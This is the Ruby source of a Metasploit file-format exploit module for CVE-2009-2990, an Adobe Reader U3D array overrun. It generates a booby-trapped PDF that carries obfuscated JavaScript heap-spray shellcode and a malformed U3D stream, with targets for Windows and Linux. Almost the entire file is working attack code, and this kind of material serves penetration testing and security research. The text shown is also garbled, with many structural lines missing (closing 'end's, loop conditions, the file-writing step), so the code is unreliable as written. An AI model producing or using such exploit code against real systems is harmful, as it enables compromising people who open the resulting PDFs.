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Test Coverage
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework

require 'zlib'

class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::FILEFORMAT

  def initialize(info = {})
      'Name'           => 'Adobe U3D CLODProgressiveMeshDeclaration Array Overrun',
      'Description'    => %q{
          This module exploits an array overflow in Adobe Reader and Adobe Acrobat.
        Affected versions include < 7.1.4, < 8.1.7, and < 9.2. By creating a
        specially crafted pdf that a contains malformed U3D data, an attacker may
        be able to execute arbitrary code.
      'License'        => MSF_LICENSE,
      'Author'         =>
          'Felipe Andres Manzano <felipe.andres.manzano[at]gmail.com>',
      'References'     =>
          [ 'CVE', '2009-2990' ],
          [ 'OSVDB', '58920' ],
          [ 'BID', '36665' ],
          [ 'URL', 'http://sites.google.com/site/felipeandresmanzano/' ],
          [ 'URL', 'http://www.adobe.com/support/security/bulletins/apsb09-15.html' ]
      'DefaultOptions' =>
          'EXITFUNC' => 'process',
      'Payload'        =>
          'Space'         => 1024,
          'BadChars'      => "\x00",
          'DisableNops'     => true
      'Platform'       => %w{ win linux },
      'Targets'        =>
          # test results (on Windows XP SP3)
          # reader 7.0.5 - untested
          # reader 7.0.8 - untested
          # reader 7.0.9 - untested
          # reader 7.1.0 - untested
          # reader 7.1.1 - untested
          # reader 8.0.0 - untested
          # reader 8.1.2 - works
          # reader 8.1.3 - works
          # reader 8.1.4 - untested
          # reader 8.1.5 - untested
          # reader 8.1.6 - untested
          # reader 9.0.0 - untested
          # reader 9.1.0 - works
          [ 'Adobe Reader Windows Universal (JS Heap Spray)',
              'Index'        => 0x01d10000,
              'Platform'    => 'win',
              'Arch'        => ARCH_X86,
              'escA'        => 0x0f0f0f0f,
              'escB'        => 0x16161616,
              'escC'        => 0x1c1c1c1c

          # untested
          [ 'Adobe Reader Linux Universal (JS Heap Spray)',
              'Index'        => 0xfffffe3c,
              'Platform'    => 'linux',
              'Arch'        => ARCH_X86,
              'escA'        => 0x75797959,
              'escB'        => 0xa2a2a2a2,
              'escC'        => 0x9c9c9c9c
      'DisclosureDate' => '2009-10-13',
      'DefaultTarget'  => 0))

        OptString.new('FILENAME', [ true, 'The file name.',  'msf.pdf']),


  def exploit
    # Encode the shellcode.
    shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))

    # Make some nops
    nops    = Rex::Text.to_unescape(make_nops(4))

    # prepare the pointers!
    ptrA = Rex::Text.to_unescape([target['escA']].pack('V'), Rex::Arch.endian(target.arch))
    ptrB = Rex::Text.to_unescape([target['escB']].pack('V'), Rex::Arch.endian(target.arch))
    ptrC = Rex::Text.to_unescape([target['escC']].pack('V'), Rex::Arch.endian(target.arch))

    script = <<-EOF
var nopz = unescape("#{nops}");
function mkSlice(stringy,size,rest){
  while (stringy.length <= size/2)
    stringy += stringy;
  stringy = stringy.substring(0, size/2 -32/2 -4/2 - rest -2/2);
  return stringy;

function spray(escA,escB,escC,escShellcode){
  var loop1;
  var pointersA = unescape(escA);
  var pointersB = unescape(escB);
  var pointersC = unescape(escC);
  var shellcode = unescape(escShellcode);

  pointersA_slide=mkSlice(pointersA,0x100000, pointersA.length);
  pointersB_slide=mkSlice(pointersB,0x100000, pointersB.length);
  pointersC_slide=mkSlice(pointersC,0x100000, pointersC.length);
  nop_slide = mkSlice(nopz,0x100000, shellcode.length);
  var xarr = new Array();
  for (loop1 = 0; loop1 < 400; loop1++) {
      xarr[loop1] = pointersA_slide+pointersA;
    else if(loop1<200)
      xarr[loop1] = pointersB_slide+pointersB;
    else if(loop1<300)
      xarr[loop1] = pointersC_slide+pointersC;
      xarr[loop1] = nop_slide+shellcode;
    return xarr;
  var memoryz = spray("#{ptrA}","#{ptrB}","#{ptrC}","#{shellcode}");
  this.pageNum = 1;

    # Obfuscate it up a bit
    script = obfuscate_js(script,
      'Symbols' => {
        'Variables' => %W{ pointersA_slide pointersA escA pointersB_slide pointersB escB pointersC_slide pointersC escC escShellcode nop_slide shellcode stringy size rest nopz loop1 xarr memoryz },
        'Methods' => %W{ mkSlice spray }

    # create the u3d stuff
    u3d = make_u3d_stream(target['Index'], "E" * 11)

    # Create the pdf
    pdf = make_pdf(script, u3d)

    print_status("Creating '#{datastore['FILENAME']}' file...")


  def obfuscate_js(javascript, opts)
    js = Rex::Exploitation::ObfuscateJS.new(javascript, opts)
    return js

  def random_non_ascii_string(count)
    result = ""
    count.times do
      result << (rand(128) + 128).chr

  def io_def(id)
    "%d 0 obj\n" % id

  def io_ref(id)
    "%d 0 R" % id

  def n_obfu(str)

    result = ""
    str.scan(/./u) do |c|
      if rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z'
        result << "#%x" % c.unpack("C*")[0]
        result << c

  def ascii_hex_whitespace_encode(str)
    result = ""
    whitespace = ""
    str.each_byte do |b|
      result << whitespace << "%02x" % b
      whitespace = " " * (rand(3) + 1)
    result << ">"

  def u3d_pad(str, char="\x00")
    ret = ""
    if (str.length % 4) > 0
      ret << char * (4 - (str.length % 4))
    return ret

  def make_u3d_stream(index, meshname)

    # build the U3D header (length will be patched in later)
    hdr_data = [1,0].pack('n*') # version info
    hdr_data << [0,0x24,31337,0,0x6a].pack('VVVVV')
    hdr = "U3D\x00"
    hdr << [hdr_data.length,0].pack('VV')
    hdr << hdr_data

    # mesh declaration
    decl_data = [meshname.length].pack('v')
    decl_data << meshname
    decl_data << [0].pack('V') # chain idx
    # max mesh desc
    decl_data << [0].pack('V') # mesh attrs
    decl_data << [0xc322].pack('V') # face count
    decl_data << [0x6226].pack('V') # position count
    decl_data << [0x24966].pack('V') # normal count
    decl_data << [0].pack('V') # diffuse color count
    decl_data << [0].pack('V') # specular color count
    decl_data << [0].pack('V') # texture coord count
    decl_data << [1].pack('V') # shading count
    # shading desc
    decl_data << [0].pack('V') # shading attr
    decl_data << [1].pack('V') # texture layer count
    decl_data << [0].pack('V') # texture coord dimensions
    decl_data << [0].pack('V') # original shading id
    # minimum resolution
    decl_data << [0x6226].pack('V') # final maximum resolution (needs to be bigger than the minimum)
    # quality factors
    decl_data << [0x12c].pack('V') # position quality factor
    decl_data << [0x12c].pack('V') # normal quality factor
    decl_data << [0x12c].pack('V') # texture coord quality factor
    # inverse quantiziation
    decl_data << [0x3f0b1e6c].pack('V') # position inverse quant
    decl_data << [0x3b6f05a6].pack('V') # normal inverse quant
    decl_data << [0x3b6f05a6].pack('V') # texture coord inverse quant
    decl_data << [0x3c2df54a].pack('V') # diffuse color inverse quant
    decl_data << [0x3c2df54a].pack('V') # specular color inverse quant
    # resource params
    decl_data << [0x3f666666].pack('V') # normal crease param
    decl_data << [0x3f000000].pack('V') # normal update param
    decl_data << [0x3f7c28f6].pack('V') # normal tolerance param
    # skeleton description
    decl_data << [0].pack('V') # bone count
    # padding
    mesh_decl = [0xffffff31,decl_data.length,0].pack('VVV')
    mesh_decl << decl_data
    mesh_decl << u3d_pad(decl_data)

    # build the modifier chain
    chain_data = [meshname.length].pack('v')
    chain_data << meshname
    chain_data << [1].pack('V') # type (model resource)
    chain_data << [0].pack('V') # attributes (no bounding info)
    chain_data << u3d_pad(chain_data)
    chain_data << [1].pack('V') # number of modifiers
    chain_data << mesh_decl
    modifier_chain = [0xffffff14,chain_data.length,0].pack('VVV')
    modifier_chain << chain_data

    # mesh continuation
    cont_data = [meshname.length].pack('v')
    cont_data << meshname
    cont_data << [0].pack('V') # chain idx
    cont_data << [0].pack('V') # start resolution
    cont_data << [0x1000].pack('V') # end resolution
    # 4096 continuation blocks
    cont_data << [index].pack('V') # split position index
    cont_data << [0].pack('v') # new diffuse color count
    cont_data << [0].pack('v') # new specular color count
    cont_data << [0].pack('v') # new text coord count
    cont_data << [0].pack('V') # new face count
    # unknown data
    cont_data << "\x07\x9c\x00\x00\x00\x37\x0c\x00\x00\xd0\x02\x00\x00\x3f\xeb\x95\x0d\x00\x00\x76"
    cont_data << "\x05\x00\x00\xea\x15\x00\x00\xe2\x02\x00\x00\x00\x00\x00\x00\x80\x82\x22\x8e\x2f"
    cont_data << "\xaa\x00\x00\x00\xc2\x13\x23\x00\x20\xbb\x06\x00\x80\xc2\x1f\x00\x80\x20\x00\x00"
    cont_data << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\xc0\x14\x01\x00\x20\x44"
    cont_data << "\x0a\x00\x10\x7e\x4b\x8d\xf8\x7c\x32\x6d\x03\x00\x00\xb2\x0b\x00\x20\xfd\x19\x00"
    cont_data << "\x20\xb6\xe9\xea\x2e\x55\x00\x00\x59\x94\x00\x00\x4c\x00\x01\x00\x1a\xbb\xa0\xc8"
    cont_data << "\xc1\x04\x00\x70\xc4\xa0\x00\x00\x00\x6c\x98\x46\xac\x04\x00\x60\xf6\x1c\x00\x20"
    cont_data << "\xa1\x0f\x00\xa0\x17\x66\x23\x00\x00\xde\x88\x1d\x00\x00\x7b\x16\x9f\x72\x9a\x1d"
    cont_data << "\x15\x00\x80\xeb\x39\x00\x00\x00\x00\x00\x00\x94\xc8\x00\x00\x54\xce\xfb\x32\x00"
    cont_data << "\x80\xc4\x3e\xb0\xc4\x88\xde\x77\x00\x00\x46\x72\x01\x00\xf0\x56\x01\x00\x8c\x53"
    cont_data << "\xe9\x10\x9d\x6b\x06\x00"
    cont_data << "\x50" # pad
    mesh_cont = [0xffffff3c,cont_data.length,0].pack('VVV')
    mesh_cont << cont_data
    #mesh_cont << u3d_pad(cont_data)
    mesh_cont << "\xa2\x00" # manual padding

    data = hdr
    data << modifier_chain
    data << mesh_cont

    # patch the length
    data[24,4] = [0x2b680].pack('V') # hardcode the data length

    if index == 0x01d10000
      #laziest hack ever! Another index must be found for using the following
      # stream in windows.. and a lot of tests shoul be done.
      return data

    # linux version
    # build the U3D header (length will be patched in later)
    hdr_data = [1,0].pack('n*') # version info
    hdr_data << [0,0x24,31337,0,0x6a].pack('VVVVV')
    meta_str1 = "alalala0"
    meta_str2 = "\xa8" * 1024
    hdr_meta = [1].pack('V')
    hdr_meta << [meta_str1.length].pack('v')
    hdr_meta << meta_str1
    hdr_meta << [1].pack('V')
    hdr_meta << [meta_str2.length].pack('V')
    hdr_meta << meta_str2
    hdr = "U3D\x00"
    hdr << [hdr_data.length,hdr_meta.length].pack('VV')
    hdr << hdr_data
    hdr << hdr_meta
    hdr << u3d_pad(hdr_meta)

    # mesh declaration
    decl_data = [meshname.length].pack('v')
    decl_data << meshname
    decl_data << [0].pack('V') # chain idx
    # max mesh desc
    decl_data << [0].pack('V') # mesh attrs
    decl_data << [0xc322].pack('V') # face count
    decl_data << [0x6626].pack('V') # position count
    decl_data << [4].pack('V') # normal count
    decl_data << [0].pack('V') # diffuse color count
    decl_data << [0].pack('V') # specular color count
    decl_data << [0].pack('V') # texture coord count
    decl_data << [1].pack('V') # shading count
    # shading desc
    decl_data << [0].pack('V') # shading attr
    decl_data << [0].pack('V') # texture layer count
    decl_data << [0].pack('V') # original shading id
    # no texture coord dimensions
    decl_data << [0x64].pack('V') # minimum resolution
    decl_data << [0x65].pack('V') # final maximum resolution (needs to be bigger than the minimum)
    # quality factors
    decl_data << [0x12c].pack('V') # position quality factor
    decl_data << [0x12c].pack('V') # normal quality factor
    decl_data << [0x12c].pack('V') # texture coord quality factor
    # inverse quantiziation
    decl_data << [0].pack('V') # position inverse quant
    decl_data << [0].pack('V') # normal inverse quant
    decl_data << [0].pack('V') # texture coord inverse quant
    decl_data << [0].pack('V') # diffuse color inverse quant
    decl_data << [0].pack('V') # specular color inverse quant
    # resource params
    decl_data << [0].pack('V') # normal crease param
    decl_data << [0].pack('V') # normal update param
    decl_data << [0].pack('V') # normal tolerance param
    # skeleton description
    decl_data << [0].pack('V') # bone count
    # padding
    mesh_decl = [0xffffff31,decl_data.length,0].pack('VVV')
    mesh_decl << decl_data
    mesh_decl << u3d_pad(decl_data)

    # build the modifier chain
    chain_data = [meshname.length].pack('v')
    chain_data << meshname
    chain_data << [1].pack('V') # type (model resource)
    chain_data << [0].pack('V') # attributes (no bounding info)
    chain_data << u3d_pad(chain_data)
    chain_data << [1].pack('V') # number of modifiers
    chain_data << mesh_decl
    modifier_chain = [0xffffff14,chain_data.length,0].pack('VVV')
    modifier_chain << chain_data

    # mesh continuation
    cont_data = [meshname.length].pack('v')
    cont_data << meshname
    cont_data << [0].pack('V') # chain idx
    cont_data << [0].pack('V') # start resolution
    cont_data << [0x100].pack('V') # end resolution
    # 256 continuation blocks
    cont_data << [index].pack('V') # split position index
    # unknown data
    cont_data << [1].pack('V') * 10
    cont_data << "Feli" * 20
    mesh_cont = [0xffffff3c,cont_data.length,0].pack('VVV')
    mesh_cont << cont_data
    mesh_cont << u3d_pad(cont_data)

    data = hdr
    data << modifier_chain
    data << mesh_cont

    # patch the length
    data[24,4] = [0x174].pack('V') # hardcode the data length
    return data


  def make_pdf(js, u3d_stream)

    xref = []
    eol = "\x0a"
    obj_end = "" << eol << "endobj" << eol

    # the header
    pdf = "%PDF-1.7" << eol

    # filename/comment
    pdf << "%" << random_non_ascii_string(4) << eol

    # js stream
    xref << pdf.length
    compressed = Zlib::Deflate.deflate(ascii_hex_whitespace_encode(js))
    pdf << io_def(1) << n_obfu("<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>" % compressed.length) << eol
    pdf << "stream" << eol
    pdf << compressed << eol
    pdf << "endstream" << eol
    pdf << obj_end

    # catalog
    xref << pdf.length
    pdf << io_def(3) << n_obfu("<</Type/Catalog/Outlines ") << io_ref(4)
    pdf << n_obfu("/Pages ") << io_ref(5)
    pdf << n_obfu("/OpenAction ") << io_ref(8)
    pdf << n_obfu(">>")
    pdf << obj_end

    # outline
    xref << pdf.length
    pdf << io_def(4) << n_obfu("<</Type/Outlines/Count 0>>")
    pdf << obj_end

    # kids
    xref << pdf.length
    pdf << io_def(5) << n_obfu("<</Type/Pages/Count 2/Kids [")
    pdf << io_ref(9) << " " # empty page
    pdf << io_ref(10) # u3d page
    pdf << n_obfu("]>>")
    pdf << obj_end

    # u3d stream
    xref << pdf.length
    pdf << io_def(6) << n_obfu("<</Type/3D/Subtype/U3D/Length %s>>" % u3d_stream.length) << eol
    pdf << "stream" << eol
    pdf << u3d_stream << eol
    pdf << "endstream"
    pdf << obj_end

    # u3d annotation object
    xref << pdf.length
    pdf << io_def(7) << n_obfu("<</Type/Annot/Subtype")
    pdf << "/3D/3DA <</A/PO/DIS/I>>"
    pdf << n_obfu("/Rect [0 0 640 480]/3DD ") << io_ref(6) << n_obfu("/F 7>>")
    pdf << obj_end

    # js dict
    xref << pdf.length
    pdf << io_def(8) << n_obfu("<</Type/Action/S/JavaScript/JS ") + io_ref(1) + ">>" << obj_end

    # page 0 (empty)
    xref << pdf.length
    pdf << io_def(9) << n_obfu("<</Type/Page/Parent ") << io_ref(5) << n_obfu("/MediaBox [0 0 640 480]")
    pdf << n_obfu(" >>")
    pdf << obj_end

    # page 1 (u3d)
    xref << pdf.length
    pdf << io_def(10) << n_obfu("<</Type/Page/Parent ") << io_ref(5) << n_obfu("/MediaBox [0 0 640 480]")
    pdf << n_obfu("/Annots [") << io_ref(7) << n_obfu("]")
    pdf << n_obfu(">>")
    pdf << obj_end

    # xrefs
    xrefPosition = pdf.length
    pdf << "xref" << eol
    pdf << "0 %d" % (xref.length + 1) << eol
    pdf << "0000000000 65535 f" << eol
    xref.each do |index|
      pdf << "%010d 00000 n" % index << eol

    # trailer
    pdf << "trailer" << eol
    pdf << n_obfu("<</Size %d/Root " % (xref.length + 1)) << io_ref(3) << ">>" << eol
    pdf << "startxref" << eol
    pdf << xrefPosition.to_s() << eol
    pdf << "%%EOF" << eol
